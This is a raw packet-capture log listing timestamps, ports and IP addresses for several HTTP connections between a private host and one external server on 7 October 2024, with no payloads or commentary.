Oct 7, 2024 11:54:25.069211960 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.080765963 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.294770002 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.330358028 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.330476046 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.330660105 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.330827951 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.331057072 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.331175089 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.331341982 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.331357002 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.331564903 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.331804037 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.331980944 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.332155943 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.332268000 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.332350016 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.332519054 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.544636965 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.544776917 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.544991970 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.545010090 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.545145988 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.545372963 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.545386076 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.545478106 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.545701981 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.545852900 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.546061039 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.546190977 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.546202898 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.546328068 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.546458960 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.546499968 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.546622038 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.546827078 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.546861887 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.546993017 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.547126055 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.547229052 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.547349930 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.547564030 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.547686100 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.547808886 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.547957897 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.548280001 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.548355103 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.548557997 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.758687019 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.758702993 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.758938074 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.759031057 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.759185076 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.759391069 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.759923935 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.759947062 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.760006905 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.760061026 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.760077953 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.760266066 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.760318041 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.760442972 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.760642052 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.760883093 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.760963917 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.761137962 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.761409998 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.761573076 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.761723042 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.761763096 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.761847019 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.762020111 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.762132883 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.762273073 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.762511015 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.762563944 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.762672901 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.762795925 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.763133049 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.763225079 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.763346910 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.763459921 CEST	80	49814	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:25.763641119 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:26.585365057 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:27.604947090 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:27.814677954 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:27.814850092 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:27.826095104 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.035897017 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.065973997 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.066363096 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.066497087 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.066512108 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.066600084 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.066672087 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.066740990 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.066749096 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.066987991 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.066993952 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.067120075 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.067306995 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.067464113 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.067501068 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.067646980 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.276176929 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.276287079 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.276520967 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.276587009 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.276910067 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.276927948 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.277031898 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.277137041 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.277189016 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.277295113 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.277312040 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.277496099 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.277730942 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.277816057 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.277962923 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.277981997 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.278089046 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.278242111 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.278367996 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.278497934 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.278683901 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.278985977 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.279072046 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.279201984 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.279217005 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.279253006 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.279424906 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.279678106 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.279728889 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.279866934 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.518820047 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.518920898 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.519073009 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.519126892 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.519254923 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.519423008 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.519484997 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.519660950 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.519808054 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.519958019 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.520025969 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.520176888 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.520484924 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.520553112 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.520714998 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.520843029 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.520946026 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.521100998 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.521178961 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.521318913 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.521437883 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.521615982 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.521647930 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.521759033 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.521909952 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.522011042 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.522264957 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.522510052 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.522643089 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.522758007 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.522789955 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.522808075 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.522932053 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:28.523039103 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.523149967 CEST	80	49815	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:28.523420095 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:29.334595919 CEST	49815	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.355986118 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.565783024 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.565968037 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.579340935 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.579408884 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.789158106 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.789632082 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.790014029 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.823043108 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.823117971 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.823376894 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.823503017 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.823518038 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.823662043 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.823710918 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.823854923 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.823996067 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.824126005 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.824240923 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.824389935 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:30.824425936 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.824583054 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:30.824754000 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.033032894 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.033049107 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.033174992 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.033793926 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.033898115 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.033974886 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.033987999 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.034003973 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.034044981 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.034188032 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.034199953 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.034349918 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.034459114 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.034539938 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.034682035 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.034785986 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.034858942 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.034993887 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.035913944 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.036051035 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.036135912 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.036149979 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.036160946 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.036250114 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.036257029 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.036257029 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.036278009 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.036385059 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.036387920 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.036528111 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.242667913 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.242710114 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.242893934 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.243036032 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.243105888 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.243303061 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.243611097 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.243702888 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.243824959 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.244066954 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.244236946 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.244404078 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.244412899 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.244463921 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.244623899 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.244635105 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.244761944 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.244961023 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.245006084 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.245147943 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.245481968 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.245620966 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.245750904 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.245857000 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.245908976 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.245914936 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.246040106 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.246186972 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.246238947 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.246404886 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.246460915 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.246586084 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.246752024 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:31.246861935 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.246974945 CEST	80	49816	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:31.247106075 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:32.084009886 CEST	49816	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:33.961750984 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.172667980 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.172888041 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.178852081 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.389178991 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.405030012 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.405122995 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.405366898 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.405489922 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.405785084 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.405832052 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.405961990 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.406018019 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.406187057 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.406306982 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.406646013 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.406774998 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.406862974 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.407093048 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.616030931 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.616101980 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.616292953 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.616311073 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.616439104 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.616650105 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.616760015 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.616981983 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.617041111 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.617093086 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.617253065 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.617460012 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.617667913 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.617775917 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.617952108 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.618077993 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.618089914 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.618328094 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.618376970 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.618499041 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.618747950 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.618870974 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.619040012 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.619121075 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.619151115 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.619266987 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.619483948 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.619538069 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.619968891 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.619968891 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.826597929 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.826663017 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.826858997 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.826879025 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.827002048 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.827450037 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.827522039 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.827589989 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.827697039 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.827699900 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.827805042 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.828063965 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.828077078 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.828191042 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.828449965 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.828573942 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.828912020 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.829049110 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.829082012 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.829129934 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.829241037 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.829313040 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.829418898 CEST	80	49817	37.140.192.23	192.168.11.30
